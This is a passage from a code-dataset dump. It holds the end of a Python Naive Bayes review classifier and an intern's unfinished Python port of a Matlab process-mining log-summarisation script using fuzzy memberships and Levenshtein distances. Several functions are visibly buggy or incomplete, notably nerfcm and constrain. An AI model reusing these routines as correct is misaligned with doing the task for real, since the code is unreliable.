classifier.\"\"\"\n self.is_trained = True\n self.train_data = train_data\n self.scores = scores\n self.fractions = self.get_fractions()\n self.rev_to_rating_sum = self.convert_data()\n self.cond_prob = self.calculate_conditional_prob(alpha)\n \n \n def get_fractions(self):\n \"\"\"assigns the fraction of all reviews belonging to each rating value\"\"\"\n count = np.bincount(self.scores)[1:]\n fractions = count / np.sum(count)\n \n return fractions\n \n def convert_data(self):\n \"\"\"creates a list in which each entry represents a sparse matrices \n with the sum of all the words of all the reviews that have the same \n rating.\"\"\"\n rev_to_rating_list = [np.where(self.scores == i) for i in range (1,6)]\n rev_to_rating = [self.train_data.tocsr()[rev_to_rating_list[i]]\n for i in range(5)]\n rev_to_rating_sum = [rev_to_rating[i].sum(axis = 0) for i in range(5)]\n \n return rev_to_rating_sum\n \n def calculate_conditional_prob(self, a = 0.001):\n \"\"\"calculates the conditional probability of a word appearing in each \n rating category. Includes Laplace Smoothing with low ɑ.\"\"\"\n size = self.train_data.get_shape()[1]\n temp = self.rev_to_rating_sum\n self.cond_prob = [(temp[i]+a)/(temp[i].sum()+1+size) for i in range(5)]\n \n return self.cond_prob\n \n def fit(self, x: spa.csr_matrix):\n \"\"\"returns a numpy.array with the predicted ratings. Applies logs to \n avoid underflow and to take into account that the probability of \n appearance of a word increases if the same word has already appeared before.\"\"\"\n \n if self.is_trained == False:\n return (\"\"\"The Classifier has not been trained. Please use \n train(train_data: spa.csr_matrix, scores: np.ndarray, \n Laplace_alpha) to train the Classifier.\"\"\")\n else:\n final_predict = np.empty(0, dtype = int)\n for row in x:\n row_indices = spa.find(row)\n predictions = [0]*5\n for i in range(5):\n for j in range(0,len(row_indices[0])):\n predictions[i] += self.fractions[i] * (\n ((self.cond_prob[i][row_indices[0][j],\n row_indices[1][j]])) ** np.log(1 + row_indices[2][j]))\n smoothed_predictions = [np.log(predictions[i]) if (predictions[i] != 0) \n else float(\"-inf\") for i in range(5)]\n final_predict = np.append(final_predict, \n smoothed_predictions.index(max(smoothed_predictions)) + 1)\n \n return final_predict \n","sub_path":"CLASS_NaiveBayesClassifier.py","file_name":"CLASS_NaiveBayesClassifier.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"92121161","text":"# python adaptation of http://is.ieis.tue.nl/research/summarization/\n# Neal Anwar, Kaiser Permanente intern\n\nimport csv\nimport numpy as np\nfrom datetime import datetime as dt\nfrom datetime import date\nimport math\nfrom scipy.spatial import distance\nfrom scipy.cluster import hierarchy\nfrom sklearn.cluster import KMeans\nimport scipy.stats\nimport warnings\n\n# this code imports some functions (mainly related to clustering)\n# directly from matlab so that when testing for accuracy outputs\n# exactly matched Matlab outputs (scikit and Matlab clustering are\n# different and produce different outputs)\nimport matlab.engine\neng = matlab.engine.start_matlab()\n\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\n# get bounds of the first section of array\n# a that contains exclusively the value k\n# (python adaptation of the Matlab (B == k) logical array function)\ndef bounds(a, k):\n # init bounds to -1\n bounds = []\n\n # logical array length\n lnth = 0\n\n # flag to detect sequence of k's\n seq = False\n\n # find range of times corresponding to this case\n for i in range(len(a)):\n # get lower bound of a sequence (count until case id appears)\n if a[i] == k:\n # increment logical array length count\n lnth += 1\n # if start of sequence\n if not seq:\n bounds.append(i)\n seq = True\n # if end of array and a sequence is in progress\n elif seq and i == len(a) - 1:\n bounds.append(i + 1)\n\n # get upper bound of a sequence (count until case id disappears)\n elif a[i] != k and seq:\n bounds.append(i)\n seq = False\n\n if len(bounds) == 1:\n bounds.append(bounds[0] + 1)\n # return bounds, len\n return bounds, lnth\n\n# constrains a to only include the ranges given in bnds\n# (python adaptation of the Matlab A(B == k) logical array index function)\ndef constrain(a, bnds):\n # constrained array\n new = list()\n\n # if bnds do not exist, return None\n if(len(bnds) == 0):\n return None\n\n # else, constrain a\n for i in range(0, len(bnds), 2):\n\n # get start bnd of current sequence\n start = bnds[i]\n\n # get end bnd of current sequence\n end = bnds[i + 1]\n\n # append current sequence to new\n new = a[start:end]\n\n # return constrained array\n return new\n\n# fuzzy set trapezoidal membership function\n# (python adaptation of the Matlab trapmf function)\ndef trapmf(v, abcd):\n x = np.zeros(shape=(len(v)), dtype=np.float_)\n y = np.zeros(shape=(len(v)), dtype=np.float_)\n\n # get a, b, c, d\n a = abcd[0]\n b = abcd[1]\n c = abcd[2]\n d = abcd[3]\n\n # print()\n # print('trapmf')\n # print(v, abcd)\n\n # set all elements of x such that v >= b to 1, < a to 0\n for i in range(len(v)):\n if v[i] >= b:\n x[i] = 1\n if v[i] < a:\n x[i] = 0\n\n # get all indices of v that are >= a and < b\n l = []\n for i in range(len(v)):\n if v[i] >= a and v[i] < b:\n l.append(i)\n\n # if l has elements and a != b\n # for all i in l, x[l[i]] = (v[l[i]] - a) * (1 / (b - a))\n for i in range(len(l)):\n # print(a, '!=', b)\n if a != b:\n # print(')', i, v[l[i]], a, b, (v[l[i]] - a) * float(1 / (b - a)))\n x[l[i]] = (v[l[i]] - a) * float(1 / (b - a))\n\n # set all elements of y such that v <= c to 1, > d to 0\n for i in range(len(v)):\n if v[i] <= c:\n y[i] = 1\n if v[i] > d:\n y[i] = 0\n\n # get all indices of v that are > c and <= d\n l = []\n for i in range(len(v)):\n if v[i] > c and v[i] <= d:\n l.append(i)\n\n # print(y, l)\n\n # if l has elements and c != d\n # for all i in l, y[l[i]] = (v[l[i]] - d) * (1 / (d - c))\n for i in range(len(l)):\n if c != d:\n # print(i, v[l[i]], c, d, (d - v[l[i]]), float(1 / (d - c)), (d - v[l[i]]) * float(1 / (d - c)))\n y[l[i]] = (d - v[l[i]]) * float(1 / (d - c))\n # print(y[l[i]])\n\n # set all elements of x to be the max of the original element\n # and the corresponding element in y\n for i in range(len(v)):\n # print(i, x[i], y[i])\n x[i] = min(x[i], y[i])\n\n # print('x', x)\n return x\n\n# non-Euclidean relational fuzzy c-means\n# (python adaptation of the Matlab nerfcm function)\ndef nerfcm(R, c, m, e):\n n = len(R)\n U0 = zeros(c, n)\n\n psize = math.ceil(n / c)\n temp = 1\n ind = [None] * n\n for i in range(n):\n ind[i] = temp\n if i % psize == 0:\n temp += 1\n\n U0 = np.zeros(shape=(c, n), dtype=np.float_)\n for i in range(n):\n U0[ind[i]][i] = 1\n\n d_adjustment = np.zeros(shape=(c, n), dtype=np.float_)\n num_it = 0\n max_it = 100\n U = U0\n beta = 0.0001\n min_d = 0.0000000001\n step_size = e\n\n while num_it < max_it and step_size >= e:\n num_it += 1\n U0 = U\n\n V = U0 * m\n V_t = list(map(list, zip(*V)))\n\n work = []\n for i in range(len(V)):\n work.append(sum(V[i]))\n\n for i in range(c):\n for j in range(V[i]):\n V[i][j] /= work[i]\n\n d = []\n for i in range(c):\n d[i] = list(map(list, zip(*(R * V[i])))) - V[i] * (list(map(list, zip(*(R * V[i])))) / 2)\n\n js = []\n for i in range(len(d)):\n elements = False\n for j in range(len(d[i])):\n if d[i][j] < 0:\n if not elements:\n elements = True\n js.append([])\n js[j].append(d[i][j])\n\n if len(js) > 0:\n for i in range(c):\n work = (V[i] * list(map(list, zip(*V[i]))) + 1) / 2\n d_adjustment[i] = work - V[i]\n\n work = (min_d - d[j]) / d_adjustment[j]\n beta_adjustment = max(work)\n beta += beta_adjustment\n\n# not mine; a python adaptation of Matlab's strdist\n# Levenshtein string distance function taken from https://en.wikibooks.org/wiki/Algorithm_Implementation/Strings/Levenshtein_distance\ndef levenshtein(s1, s2):\n if len(s1) < len(s2):\n return levenshtein(s2, s1)\n\n # len(s1) >= len(s2)\n if len(s2) == 0:\n return len(s1)\n\n previous_row = range(len(s2) + 1)\n for i, c1 in enumerate(s1):\n current_row = [i + 1]\n for j, c2 in enumerate(s2):\n insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer\n deletions = current_row[j] + 1 # than s2\n substitutions = previous_row[j] + (c1 != c2)\n current_row.append(min(insertions, deletions, substitutions))\n previous_row = current_row\n\n return previous_row[-1]\n\n######################################################\n# PART 0: Parse data log\n######################################################\n\n# business log file name\nfile_name = 'appeal.csv'\n\n# open file, convert contents to 2-D list, close file\nf = open(file_name, 'r')\ndata = list(csv.reader(f));\nf.close()\n\n# remove header row\ndata = data[1:]\n\n# transpose list so each category is stored in a sublist\ndata = [list(i) for i in zip(*data)]\n\n# create array of references to sublists\nids = [None] * len(data)\n\n# create array of references to unique indices in sublists\nidxs = [None] * len(data)\n\n# fill reference arrays\nfor i in range(len(data)):\n # if field is not a time field\n if i != 3 and i != 4:\n # fill \"ids\" with references to duplicates-removed, sorted sublists\n # fill \"idxs\" with indices of unique elements in sublist\n ids[i], idxs[i] = np.unique(data[i], return_inverse=True)\n else:\n # fill \"ids\" with references to raw time data\n ids[i] = data[i]\n\n# convert start/end times to ordinals\n# add 366 days to account for difference between python and Matlab ordinal system\nfor i in range(3, 5):\n for j in range(len(ids[i])):\n ids[i][j] = dt.strptime(ids[i][j], \"%Y/%m/%d %H:%M:%S.%f\").toordinal() + 366\n\n# get num cases\nn = len(ids[0])\n\n# create feature list\nlabels = ['caseID', 'throughput time', 'operating time', 'waiting time',\n 'reason', '# of activities', '# of resources']\n\n######################################################\n# PART 1: Create case info matrix\n# > Each of the n rows correspond to a case\n# > Column #1 is unique case ID\n# > Column #2 is total time duration of case (greatest end time - least begin time across all activities in case)\n# > Column #3 is total time elapsed during activities during case (sum of differences in end and begin times across all activities in case)\n# > Column #4 is duration - time elapsed\n# > Column #5 is minimum reason index used by case\n# > Column #6 is total number of activities in case\n# > Column #7 is total number of resources in case\n######################################################\n\n# create n x 7 matrix of zeros\nmat = np.zeros(shape=(n, 7), dtype=np.int)\n\n# replace first column of matrix with indices of case IDs\nmat[:,0] = np.unique(idxs[0])\n\nprint(idxs[5])\n\n# for each case\nfor i in range(n):\n times = [None] * 2\n\n # get bounds + logical array length for case i\n bnds, lnth = bounds(idxs[0], i)\n\n # get start and end times for case i\n for j in range(3, 5):\n\n # get and store range\n times[j - 3] = constrain(ids[j], bnds)\n\n # get max stop, get min start\n max_stop = np.max(times[1])\n min_start = np.min(times[0])\n\n # get difference in days, save to 2nd col\n diff = dt.fromordinal(max_stop) - dt.fromordinal(min_start)\n diff = diff.days\n mat[i][1] = diff\n\n # get sum of difference between end and start times, save to 3rd col\n sum = np.sum(np.subtract(times[1], times[0]))\n mat[i][2] = sum\n\n # get difference between mat[i][1] and mat[i][2], save to 4th col\n mat[i][3] = np.subtract(mat[i][1], mat[i][2])\n\n # get min unique reason index used by case i, save to 5th col\n reasons = np.min(constrain(idxs[5], bnds))\n mat[i][4] = reasons\n\n # get number of activities in case i, save to 6th col\n mat[i][5] = lnth\n\n # get number of unique resources in case i, save to 7th col\n mat[i][6] = len(np.unique(constrain(idxs[2], bnds)))\n\n######################################################\n# PART 2: Append activity and resource matrices to case info matrix\n# > Create two n x m matrices (n is total number of cases, m is number of unique activities/resources)\n# > Each row corresponds to a different case\n# > Each row counts the number of times each activity/resource was used in case n\n# > Names of activities/resources are saved in labels matrix\n# > Activity and resource matrices are appended to case info matrix\n######################################################\n\n# create and fill activity and resource matrices\nfor i in range(1, 3):\n # get number of activities/resources\n m = len(ids[i])\n\n # create new labels list\n new_labels = [None] * m\n\n # create n x m new matrix\n new_mat = np.zeros(shape=(n, m), dtype=np.int)\n\n # for each activity/resource\n for j in range(m):\n # save activity/resource name\n new_labels[j] = ids[i][j]\n\n # for each case, get number of occurrences for each activity/resource\n for k in range(n):\n # get bounds + logical array length for case k\n bnds, lnth = bounds(idxs[0], k)\n\n # get activities/resources corresponding to case k\n items = constrain(idxs[i], bnds)\n\n # get bounds + length for act/res j in the act/res corresponding to case k\n bnds, lnth = bounds(items, j)\n\n # get number of times act/res j was done in case k, save to new_mat[k][j]\n new_mat[k][j] = lnth\n\n # concatenate original labels list and new labels list\n labels = labels + new_labels\n\n # concatenate original matrix and new matrix\n concat_mat = np.zeros(shape=(n, mat.shape[1] + m), dtype=np.int)\n concat_mat[:, :mat.shape[1]] = mat\n concat_mat[:, mat.shape[1]:] = new_mat\n mat = concat_mat\n\n######################################################\n# PART 3: Create activity traces, traces_index, and count matrices\n# > Create n x k traces matrix (k is max number of possible activities in a case),\n# where each row j is a \"trace\" of the activities done in case j\n# in order converted to a string (i.e. if case 3 had activities\n# 1, 3, 3, 2, and 4, traces[3] would be 'a, b, b, c, d')\n#\n# > Create n x k traces index matrix where each row j is a trace of the\n# absolute indices of activities in case j across all cases (i.e. if all\n# cases had 5 activities traces_idx[2] would be '5, 6, 7, 8, 9')\n# because the activities within it are the 5th through 9th activities overall\n#\n# > Create n x 1 activity count matrix where each index is the number\n# of activities in case n (Keep in mind, this activity count vector\n# already exists as the 5th column of the case info matrix, but the\n# original Matlab code wanted it created anyway)\n######################################################\n\n# arrays to record incidence of activities in each case\n# traces and trace_idx have k cols where k is the number of activities\n# the case with the most activities has (to make room for this case)\nk = np.max(mat[:, 5])\n\ntraces = np.full(shape=(n, k), fill_value=-1, dtype=np.int)\ntrace_idx = np.full(shape=(n, k), fill_value=-1, dtype=np.int)\n# idx keeps track of how many activities a case has\nidx = [0] * n\n\n# get number of activities\nm = len(idxs[1])\n\n# for every (non-unique) activity i\nfor i in range(m):\n # get the unique index of the case j that invoked that activity\n j = idxs[0][i]\n\n # get the unique index of activity i, save to\n # next open index in row for case j\n traces[j][idx[j]] = idxs[1][i]\n\n # record index of activity in row for case j\n trace_idx[j][idx[j]] = i\n\n # increment activity count of case j\n idx[j] += 1\n\n# convert traces to a char array\ntraces_char = np.zeros(shape=(n, np.max(mat[:, 5])), dtype=np.unicode_)\nfor i in range(len(traces)):\n for j in range(len(traces[i])):\n traces_char[i][j] = chr(ord('a') + traces[i][j])\n\n######################################################\n# PART 4: Create unique sequence, sequence distance, and sequence index matrices\n# > Create matrix of all unique string sequences of ordered\n# activities (of all lengths from 2 to k) found across all cases (label_s)\n#\n# > Create sequence distances matrix where each row represents a\n# case j and there are k - 2 groups of columns where the xth column\n# group has s columns where s is the number of unique string activity\n# sequences of length x + 1 across all cases. For example, if there\n# 30 unique sequences of length 2 across all cases, the first column\n# group of the matrix will have 30 columns. Each column x contains the\n# least of the Levenshtein distances between the unique sequence x\n# and any sequence of the same length in the case (i.e. if row y, column x\n# is 1 (meaning zero distance), sequence x can be found in case y).\n# These least distance column groups for unique sequences occur in\n# increasing order of sequence length from left to right, from length 2 to k.\n#\n# > Create sequence index matrix where each row represents a\n# case j and there are k - 2 groups of columns where the xth column\n# group has s columns where s is the number of unique string activity\n# sequences of length x + 1 across all cases. This time, each column\n# m in column group x contains the indices of the earliest occurrence\n# of the unique sequence m of length x + 1 in case y. If this sequence\n# never occurs in case y, it contains the value -1.\n######################################################\n\n# create a matrix to store k label_seqs of different shapes\nlabel_s = [None] * (k - 1)\nmat_s = np.zeros(shape=(n, 1), dtype=np.float_)\nseq_ind = np.zeros(shape=(n, 1), dtype=np.int)\n\n# from 2 to max number of activities\nfor i in range(2, k + 1):\n # get number of possible activities left\n l = k - i + 1\n\n # create matrix of -1's with (remaining activity slots) * (number of cases) rows and i rows\n mat_pom = np.full(shape=(l * n, i), fill_value=-1, dtype=np.int)\n\n # partition traces into k / i equal columns of size i, and stack them\n # on top of one another in mat_pom, creating a matrix whose rows are\n # all the sequences of activities i long that exist in the log\n for j in range(l):\n mat_pom[(j * n):(j + 1) * n, :] = traces[:, j:j + i]\n\n # eliminating duplicate sequences of activities i long from mat_pom\n seq = np.unique(mat_pom, axis=0)\n\n # construct a logical array of the same size\n log = np.zeros(shape=(seq.shape[0], seq.shape[1]), dtype=np.int)\n\n # if (x, y) in seq is -1, set (x, y) in log to 1, marking all empty\n # activity spots in the set of unique sequences i long in log,\n # all other slots in the array being 0\n for x in range(len(log)):\n for y in range(len(log[x])):\n log[x][y] = seq[x][y] == -1\n\n # reduce log to a vector that contains only the max values of each row\n # of log, creating a vector where index j being 1 indicates that a unique\n # sequence of length i in the log had at least one empty activity slot\n log = np.amax(log, axis=1)\n\n # invert log, creating a vector where index j being 1 indicates that unique\n # a unique sequence of length i had no empty activity slots\n log = (log + 1) % 2\n\n # count number of activities in log with no empty activity slots\n cnt = 0\n for x in range(len(log)):\n cnt += log[x]\n\n # constrain seq to unique sequences that have no empty activity slots\n new_seq = np.zeros(shape=(cnt, seq.shape[1]), dtype=np.int)\n\n y = 0\n for x in range(len(log)):\n if log[x] == 1:\n new_seq[y,:] = seq[x,:]\n y += 1\n\n seq = new_seq\n\n # get number of unique sequences of length i\n s = len(seq)\n\n # create label seq matrix\n label_seq = np.zeros(shape=(s, seq.shape[1]), dtype=np.int)\n\n # create n x s seq matrix and matrix of zeros\n mat_seq = np.zeros(shape=(n, s), dtype=np.float_)\n sI = np.full(shape=(n, s), fill_value=-1, dtype=np.int)\n\n # for each unique sequence of length i\n for x in range(s):\n # copy xth unique sequence to label_seq\n label_seq[x,:] = seq[x,:]\n\n # convert unique sequence to string\n seq_char = np.zeros(shape=(seq.shape[1]), dtype=np.unicode_)\n for y in range(len(seq[x])):\n seq_char[y] = chr(ord('a') + seq[x][y])\n\n # for each case\n for y in range(n):\n # get the remaining number of activities in case y once\n # i activities have been removed\n # (i.e. calculate number of activities in case y - i + 1)\n l = mat[y][5] - i + 1\n\n # if no activities remain, set l to 1 (because we will still want\n # to look at one sequence of length k in the following loop)\n if l < 1:\n l = 1;\n\n # for each of the other string sequences of length i in case y\n for z in range(l):\n # calculate Levenshtein string distance between the current unique\n # string sequence of length i and the sequence of length i\n # from z:z + i in case y\n d = levenshtein(seq_char, traces_char[y, z:z + i])\n\n # subtract this distance from i, divide by the number of\n # characters in each string i\n d = 1 - d / float(i)\n\n # if distance is 1 (meaning two sequences are identical),\n # mark the slot in sI for this sequence (x) and this case (y)\n # with the number z (if this has not already been done),\n # afterwards the sI matrix will be filled with the starting\n # index of the earliest occurrence of the current unique\n # string sequence of length i in case y\n if d == 1 and sI[y][x] == -1:\n sI[y][x] = z;\n\n # record the least Levenshtein distance measured so far for\n # this sequence (row x) in case (y) in mat_seq\n # (i.e. record the least of all the distances between sequence\n # x and all other sequences of length i in case y)\n mat_seq[y][x] = max(mat_seq[y][x], d)\n\n # save label_seq to an index in label_s\n label_s[i - 2] = label_seq\n\n # concatenate mat_seq and mat_s\n new_mat_s = np.zeros(shape=(n, mat_s.shape[1] + mat_seq.shape[1]), dtype=np.float_)\n new_mat_s[:, :mat_s.shape[1]] = mat_s\n new_mat_s[:, mat_s.shape[1]:] = mat_seq\n mat_s = new_mat_s\n\n # concatenate seq_ind and sI\n new_seq_ind = np.zeros(shape=(n, seq_ind.shape[1] + sI.shape[1]), dtype=np.int)\n new_seq_ind[:, :seq_ind.shape[1]] = seq_ind\n new_seq_ind[:, seq_ind.shape[1]:] = sI\n seq_ind = new_seq_ind\n\n# crop out 1st columns of matrices\nmat_s = mat_s[:,1:]\nseq_ind = seq_ind[:,1:]\n\n# get number of matrices in label_s\ns = len(label_s)\n\n# create count of total rows in label_s\nrows_s = 0\n\n######################################################\n# PART 5: Create sequence info matrix, sequence label matrix\n# > Create matrix with s sets of m + 4 rows, where s is the number of unique\n# sequences of lengths 2 to k across all cases, and m is the number\n# of unique resources.\n# The xth set of rows contains various pieces of information about\n# sequence x:\n# Row 1) total duration of sequence in days\n# Row 2) total time elapsed during sequence in days\n# Row 3) difference between duration and time elapsed during sequence\n# Row 4) number of unique resources used by sequence\n# Row 5 to Row m) count of how many times resources 1 through m were used\n# by sequence\n#\n# > Create matrix with s sets of m + 4 rows, where s is the number of unique\n# sequences of lengths 2 to k across all cases, and m is the number\n# of unique resources. This matrix' rows store info about the meanings of\n# the rows in the sequence info matrix. It labels total duration as\n# \"throughput time\", total time elapsed as \"operation time\", and the\n# difference of the two as \"waiting time.\" It also stores the names of\n# each activity in the order their usage is recorded.\n######################################################\n\n# get number of resources\nm = len(ids[2])\n\n# create a matrix to store (m + 4) * s resource label matrices of different shapes\nlabel_per = [None] * (m + 4) * seq_ind.shape[1]\nmat_per = np.zeros(shape=(n, (m + 4) * seq_ind.shape[1]), dtype=object)\n\n# for all unique sequences of length 2 to k\nfor i in range(s):\n for j in range(len(label_s[i])):\n # get indices of all occurrences of unique sequence rows_s\n # (i.e. unique IDs of cases that contain occurrences)\n ind = np.argwhere(seq_ind[:, rows_s] > -1)\n\n # get length of this unique sequence\n l = len(label_s[i][j])\n\n # get number of occurrences of this sequence across all cases\n k = len(ind)\n\n # store four entries in label_per corresponding to this sequence\n label_per[(rows_s * (m + 4)) + 1] = 'throughput time: ' + str(label_s[i][j])\n label_per[(rows_s * (m + 4)) + 2] = 'operation time: ' + str(label_s[i][j])\n label_per[(rows_s * (m + 4)) + 3] = 'waiting time: ' + str(label_s[i][j])\n label_per[(rows_s * (m + 4)) + 4] = '# of resources: ' + str(label_s[i][j])\n\n # for all resources x, add another entry in label_per corresponding\n # to this sequence with a label corresponding to this resource\n for x in range(m):\n label_per[(rows_s * (m + 4)) + 4 + x] = 'resource ' + str(ids[2][x]) + ' used : ' + str(label_s[i][j])\n\n # for all cases which contain occurrences of this sequence\n for x in range(k):\n\n # ind[x][0] = unique ID of case x\n # seq_ind[ind[x][0], rows_s] = index of occurrence of this sequence in case x\n # trace_idx[ind[x][0], seq_ind[ind[x][0], rows_s]] = absolute starting point of this sequence\n # trace_idx[ind[x][0], seq_ind[ind[x][0], rows_s] + l - 2] + 1] = absolute ending point of this sequence\n # (i.e. bnds is the start and end index of this sequence across all cases)\n bnds = [trace_idx[ind[x][0], seq_ind[ind[x][0], rows_s]],\n trace_idx[ind[x][0], seq_ind[ind[x][0], rows_s] + l - 1] + 1]\n\n # get range of start and end times over this sequence\n start = constrain(ids[3], bnds)\n end = constrain(ids[4], bnds)\n\n # get total duration of sequence in days, save to mat_per\n max_stop = np.max(end)\n min_start = np.min(start)\n diff = dt.fromordinal(max_stop) - dt.fromordinal(min_start)\n diff = diff.days\n\n mat_per[ind[x][0], (rows_s * (m + 4))] = diff\n\n # get total time elapsed during sequence in days, save to mat_per\n sum = 0\n for y in range(len(start)):\n diff = dt.fromordinal(end[y]) - dt.fromordinal(start[y])\n diff = diff.days\n sum += diff\n\n mat_per[ind[x][0], (rows_s * (m + 4)) + 1] = sum\n\n # get difference between time duration and time elapsed, save to mat_per\n mat_per[ind[x][0], (rows_s * (m + 4)) + 2] = mat_per[ind[x][0], 0] - mat_per[ind[x][0], 1]\n\n # get total resources used by this sequence\n res = constrain(idxs[2], bnds)\n\n # get unique resources used by this sequence\n indices = np.unique(res, bnds)\n\n # get number of different resources used by this sequence, save to mat_per\n mat_per[ind[x][0], (rows_s * (m + 4)) + 3] = len(indices)\n\n # for all resources\n for y in range(m):\n # get count of resource y in this sequence, save to mat_per\n sum = 0\n for z in range(len(res)):\n if res[z] == y:\n sum += 1\n\n mat_per[ind[x][0], (rows_s * (m + 4)) + 4 + y] = sum\n\n # increment count of total rows in label_s\n rows_s += 1\n\n######################################################\n# PART 6: Create trap membership dictionary\n# > Create trap membership dictionary with 15 + s1 + s2 + 2s3\n# rows, where s1, s2, s3 are the number of unique reasons,\n# activities, and resources, respectively. The content of\n# the rows:\n# Rows 1 to 9): store possible quantifiers ('short',\n# 'medium', 'long') for each type of time value\n# ('throughput', 'operating', 'waiting'), as well as the\n# trap bounds that delineate them\n# Rows 10 to s1): store trap bounds for each unique reason\n# Rows s1 + 1 to s1 + 7): store possible quantifiers ('small',\n# 'medium', 'large') for each type of activity/resource\n# as well as the trap bounds that delineate them\n# Rows s1 + 7 to s2): store trap bounds for each unique activity\n# Rows s2 to s3): store trap bounds for each unique resource\n# Rows s3 to 2s3): store labels for each unique resource\n######################################################\n\n# get number of unique reasons, activities, and resources\ns1 = len(ids[5])\ns2 = len(ids[1])\ns3 = len(ids[2])\n\n# create space for 9 quantifiers related to time,\n# info related to each reason, 6 quantifiers related\n# to activities/reasons, info related to each activity,\n# and two sets of info related to each resource\ns = 9 + s1 + 6 + s2 + (2 * s3)\n\n# columns: labels, quantifiers, bounds, norm\ndct = []\nfor row in range(s):\n dct += [[0] * 4]\n\n# establish time quantifiers and trap bounds for them\nlen_mat = ['short ', 'medium ', 'long ']\ntime_mat = [[0, 0, 30, 60], [30, 60, 150, 200], [150, 200, 1000, 1000]]\n\n# fill in labels, quantifiers, and trap bounds\n# for throughput time, operating time, waiting time\nfor i in range(9):\n dct[i][0] = labels[int(i / 3) + 1]\n dct[i][1] = len_mat[i % 3] + str(dct[i][j])\n dct[i][2] = time_mat[i % 3]\n\n# fill in labels, quantifiers, and trap bounds\n# for all reasons\nfor i in range(s1):\n dct[i + 9][0] = labels[4]\n dct[i + 9][1] = 'reason was ' + str(ids[5][i])\n dct[i + 9][2] = [i - 0.2, i - 0.1, i + 0.1, i + 0.2]\n\ntime_mat = [[0, 0, 2, 4], [2, 4, 8, 10], [8, 10, 20, 20]]\nlen_mat = ['small ', 'medium ', 'large ']\n\n# number of activities\nfor i in range(10, 13):\n dct[s1 + i - 1][0] = labels[5]\n dct[s1 + i - 1][1] = len_mat[i % 3 - 1] + labels[5]\n dct[s1 + i - 1][2] = time_mat[i % 3 - 1]\n\ntime_mat = [[0, 0, 0.2, 0.3], [0.2, 0.3, 0.5, 0.7], [0.5, 0.7, 1, 1]]\n\n# number of resources\nfor i in range(13, 16):\n dct[s1 + i - 1][0] = labels[6]\n dct[s1 + i - 1][1] = len_mat[i % 3 - 1] + labels[6]\n dct[s1 + i - 1][2] = time_mat[i % 3 - 1]\n dct[s1 + i - 1][3] = 1\n\n# number of times action X was performed\nfor i in range(s2):\n dct[s1 + i + 15][0] = labels[7 + i]\n dct[s1 + i + 15][1] = str(ids[1][i]) + ' '\n dct[s1 + i + 15][2] = [0.8, 0.9, 100, 100]\n\n# number of times resource X was used\nfor i in range(s3):\n dct[s1 + s2 + i + 15][0] = labels[7 + s2 + i]\n dct[s1 + s2 + i + 15][1] = str(ids[2][i]) + ' '\n dct[s1 + s2 + i + 15][2] = [0.8, 0.9, 100, 100]\n\nfor i in range(s3):\n dct[s1 + s2 + s3 + i + 15][0] = labels[7 + s2 + i]\n dct[s1 + s2 + s3 + i + 15][1] = str(ids[2]) + ' many times'\n dct[s1 + s2 + s3 + i + 15][2] = [0.25, 0.3, 1, 1]\n dct[s1 + s2 + s3 + i + 15][3] = 1\n\n######################################################\n# PART 8: Compute trap membership matrix\n# > For each entry of the trap membership dictionary\n# created above, get the corresponding info from\n# the case info matrix and compute the trap membership\n# value of this info for the given bounds, storing\n# it in a new trap membership matrix. For example,\n# the first entry of the trap membership dictionary\n# has bounds for \"throughput time,\" so get the\n# throughput time for every case (column #2 of the\n# case info matrix) and calculate the trap membership\n# of each of these times in the bounds in the entry.\n######################################################\n\nn = len(mat)\nmem = np.zeros(shape=(n, s), dtype=np.float_)\n\n# for all entries in dct\nfor i in range(s):\n # collect info corresponding to this entry from case info matrix\n pom = []\n\n for j in range(len(labels)):\n if labels[j] == dct[i][0]:\n for k in range(len(mat[:])):\n pom.append(mat[:, j][k])\n\n # if entry has norm flag (i.e. entry is resource entry),\n # divide all info by number of activities in corresponding case\n if dct[i][3] == 1:\n for j in range(len(pom)):\n pom[j] = pom[j] / float(mat[j][5])\n\n # store trap membership of case info in trap bounds for this entry\n mem[:, i] = trapmf(pom, dct[i][2])\n\n######################################################\n# PART 9: Compute representative sequence distance array\n# > Find all representative unique sequences (that is,\n# all unique sequences that have a trap membership\n# of greater than the threshold value of 0.7 in any\n# of the three global quantifiers). Then create a\n# s x s matrix where s is the number of representative\n# sequences and row i, column j is the distance between\n# the ith and the jth representative sequence.\n######################################################\n\n# label, bounds\nquant = []\nfor row in range(3):\n quant += [[0] * 2]\n\n# create global quantifier labels and bounds\nlabels_q = ['many', 'most', 'almost all']\npar_q = [[0.3, 0.5, 1, 1], [0.45, 0.7, 1, 1], [0.7, 0.9, 1, 1]]\n\nfor i in range(3):\n quant[i][0] = labels_q[i]\n quant[i][1] = par_q[i]\n\n# get array of average trap memberships of the least distances for\n# each unique sequence in the given bounds\n# (i.e. an array of the average similarity for each sequences to others)\ntp = []\nfor i in range(len(mat_s[0])):\n tp.append(np.sum(trapmf(mat_s[:, i], [0.2, 1, 1, 1])) / n)\n\ntp3 = np.tile(tp, (3, 1))\n\n# get trap membership of similarity metric in each\n# set of quantifier bounds\n# (i.e. see whether similarity metric qualifies as 'many', 'most',\n# or 'almost all')\nfor i in range(3):\n tp3[i, :] = trapmf(tp, quant[i][1])\n\n# get logical array for each sequence that is 1 if\n# the sequence fits into any quantifier ('many', 'most', 'almost all')\n# with a membership greater than the threshold of 0.7,\n# 0 if it does not fit into any quantifier with this value\ntp0 = []\nfor i in range(tp3.shape[1]):\n max_col = tp3[:, i].max(axis=0)\n tp0.append(1 if max_col > 0.7 else 0)\n\nST = []\nLST = []\ntp3_new = []\n\n# fill ST with all the columns of least distances for\n# sequences that scored 0.7 or higher on at least\n# one quantifier, and condense tp3 to these columns\n# as well (removing sequences that are not\n# sufficiently representative, indicating that they\n# scored below 0.7 on all quantifiers)\nfor i in range(len(tp0)):\n if tp0[i] == 1:\n ST.append(mat_s[:, i])\n tp3_new.append(tp3[:, i])\n\n# fill LST with the representative sequences themselves\nl = 0\nfor i in range(len(label_s)):\n for j in range(len(label_s[i])):\n if tp0[l] == 1:\n LST.append(label_s[i][j])\n\n l += 1\n\ntp3 = tp3_new\n\n# get number of representative sequences\nk = len(LST)\n\n# get lengths of representative sequences\nsizes = np.zeros(shape=(k), dtype=np.float_)\n\nfor i in range(k):\n sizes[i] = len(LST[i])\n\nD = np.zeros(shape=(k, k), dtype=np.float_)\n\n# get array of distances between all representative strings\nfor i in range(k - 1):\n 